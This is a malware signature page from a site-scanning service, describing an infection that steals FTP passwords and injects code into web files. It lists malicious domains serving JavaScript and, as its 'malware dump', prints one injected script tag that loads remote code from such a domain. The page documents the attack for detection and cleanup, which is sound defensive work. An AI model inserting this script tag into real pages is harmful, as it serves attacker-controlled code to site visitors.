SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwjs3029

malware-entry-mwjs3029

Description: This malware infects a web site through a compromised desktop (with virus), where
it steals any stored password from the FTP client and uses that to attack the site.
Note that every PHP, HTML and JS file can get compromised by this malware.

*On some variations, we are also seeing sites get hacked through outdated web applications (Joomla and WordPress).

Domains used::


http://www.update-java.kit.net/java.js
http://coracaodedavi.com.br/plugin.js
www.update-java.net
http://wholelifewholeworld.com/jslib/le.js

Affecting: Any web site with FTP enabled (and password stolen).

Clean up:Sign up here: http://sucuri.net/signup

Malware dump:


<script src="http://wholelifewholeworld.com /jslib/le.js"></script>